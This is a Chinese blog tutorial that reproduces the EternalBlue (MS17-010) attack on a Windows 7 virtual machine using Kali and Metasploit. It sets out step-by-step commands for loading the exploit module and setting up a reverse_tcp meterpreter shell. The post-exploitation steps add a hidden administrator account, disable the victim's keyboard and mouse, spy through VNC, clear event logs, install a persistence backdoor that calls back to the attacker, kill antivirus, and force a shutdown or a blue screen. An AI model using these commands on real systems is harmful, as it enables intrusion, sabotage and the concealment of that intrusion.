kali入门到入狱之 永恒之蓝(MS17-010)复现.

利用永恒之蓝(MS17-010)拿到电脑win7(32位)权限(包含:开关键盘/鼠标,文件上传,开启的远程桌面,使用摄像头拍照,重新启动计算机,关闭防护软件,取消户登录,电脑蓝屏等等......

    

免责声明:

严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

   

Kali2021(链接:https://pan.baidu.com/s/1jzaqjiEQVEHQdRRIp72f3Q

提取码:tian )

   

Win7 (32)(链接:https://pan.baidu.com/s/1r7Y3jA4hfb4sTKKh0ubNIw

提取码:tian )

    

实验均为本地虚拟机(kali:192.168.0.114)(win7(32位):192.168.0.115

    

文件:Eternalblue-Doublepulsar-Metasploit-master

(链接:https://pan.baidu.com/s/1MTQaSOrRSrFw_eWmnyr8Dw

提取码:tian )

     

第一步:下载 Eternalblue-Doublepulsar-Metasploit-master ,将其解压放到root目录下重新命名为 Eternalblue-Doublepulsar-Metasploit

    

第二步:把 Eternalblue-Doublepulsar-Metasploit 文件中的 ternalblue_doublepulsar.rb

拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

命令顺序:

(1)cd Eternalblue-Doublepulsar-Metasploit-master        #cd是切换文件目录

(2)cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb     #拷贝

(3)cd /usr/share/metasploit-framework/modules/exploits/windows/smb     #切换文件目录

      

第三步:然后在 cd /usr/share/metasploit-framework/modules/exploits/windows/smb目录下(安装win 32架构)

命令:dpkg --add-architecture i386 && apt-get update && apt-get install wine32

安装过程中可能时间比较长,耐心等候.

安装过程中的问题:(1)选择<NO>        (2)选择cron

    

第四步:运行 wine -h

    

第五步:然后再运行 postgresql 数据库

命令:service postgresql start

   

第六步:打开 msfconsole

     

第七步:使用 exploit 模块

命令顺序:

(1)use exploit/windows/smb/eternalblue_doublepulsar        #使用模块

(2)set payload windows/meterpreter/reverse_tcp          #设置payload

(3)show options                       #查看模块信息

(4)set rhosts 192.168.0.115                   #要攻击的受害电脑地址(win7)

(5)set lhost 192.168.0.114                    #本地的kali地址

     

 方法1:  

(6)set processinject explorer.exe       #设置进程注入进入命令行下

(7)run       #攻击

       

(8)execute  -H -i -f cmd.exe       #可以进到受害电脑的命令行下

但你想查看ip地址等信息时出现乱码:

    

(9)输入:chcp 65001

     

(10)切换到受害电脑桌面:cd c:\users\administrator\desktop                                                

将kali里的文件上传文件到受害电脑上:echo > 文件名

受害电脑的效果:

    

(11)添加用户名密码

命令的使用:net user 用户名 密码 /add

命令的使用:net localgroup Administrators 用户名 /add

命令:net user tian3 123456 /add 

命令:net localgroup Administrators tian3 /add 

     

(12)输入:exit 可以退到 meterpreter

    

(13)#开关受害电脑键盘/鼠标:uictl   

#开启或禁止键盘/鼠标:uictl [enable/disable] [keyboard/mouse/all]        

#禁用鼠标: uictl disable mouse

#禁用键盘: uictl disable keyboard

此时受害电脑的鼠标已被禁用

开启已被禁用的鼠标

此时受害电脑的键盘已被禁用

开启已被禁用的键盘

     

(13)#开启受害电脑的远程桌面:run vnc

可以看到受害电脑做干什么.

    

(14)#重新启动受害电脑的计算机:reboot

受害电脑的效果:

    

(15)#清除事件日志:clearev

      

(16)植入后门 :  run  persistence -X -i  5  -p 4444 -r 192.168.0.114

-X 在目标主机上开机自启动

-i  不断尝试反向连接的时间间隔

-r kali的地址

(17)关闭防护软件:run killav

   

方法2:

(6)set processinject lsass.exe       —设置进程注入后1分钟受害电脑关机

受害电脑的效果:  

    

方法3:

(6)set processinject winlogon.exe       --设置进程注入取消受害电脑用户登录

受害电脑的效果:

      

方法4:

(6)set processinject wininit.exe     --设置进程注入受害电脑蓝屏

受害电脑的效果:

  

  

  

参考链接:利用MS17-010渗透win7(32位)_1stPeak's Blog-CSDN博客_永恒之蓝32位利用

  

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值